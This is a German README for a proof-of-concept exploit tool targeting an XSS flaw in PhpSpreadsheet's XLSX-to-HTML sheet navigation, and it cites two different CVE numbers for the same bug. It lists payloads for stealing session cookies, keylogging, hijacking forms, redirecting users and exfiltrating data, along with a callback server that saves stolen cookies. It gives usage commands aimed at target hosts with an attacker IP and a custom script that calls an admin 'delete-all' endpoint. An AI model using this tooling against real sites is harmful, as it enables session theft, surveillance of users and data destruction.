
Dies ist ein PoC/Exploit für die CVE-2024-47875 PhpSpreadsheet XSS Sicherheitslücke.
Dies ist ein PoC zur CVE-2025-22131, einer Cross-Site Scripting (XSS)-Sicherheitslücke in PhpSpreadsheet-Versionen vor 2.2.2, 2.1.2 und 1.29.4. Die Schwachstelle befindet sich in der Funktion generateNavigation(), die Sheet-Namen während der XLSX-zu-HTML-Konvertierung nicht bereinigt, was die Einschleusung schädlichen JavaScripts ermöglicht.
CVE ID: CVE-2024-47875
GitHub Advisory: GHSA-79xx-vf93-p7cx
Affected Versions: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
Author: Roj
License: MIT
Repository: PoC Repo
📄 Erzeugt bösartige XLSX-Dateien mit anpassbaren XSS-Payloads
🛠️ Unterstützt mehrere Payload-Typen:
cookie_theft: Stiehlt Sitzungscookies
redirect: Leitet Benutzer auf eine vom Angreifer kontrollierte Seite um
alert: Zeigt einen Test-Alert für den PoC an
keylogger: Erfasst Tastatureingaben
form_hijack: Fängt Formularübermittlungen ab
data_exfil: Exfiltriert Daten von einem bestimmten Endpunkt
🌐 Integrierter HTTP-Server zum Erfassen von Exploit-Callbacks
⬆️ Lädt bösartige XLSX-Dateien auf einen Zielendpunkt hoch
💾 Speichert erfasste Daten (z. B. Cookies) in einer JSON-Datei
🎨 Farbige Terminalausgabe für bessere Lesbarkeit
🔍 Ausführliche Protokollierung zum Debuggen
python exploit.py -h
🚀 Anwendungsbeispiele:
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50
# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
Ich wünsche mir Rückmeldungen, viel Glück euch allen.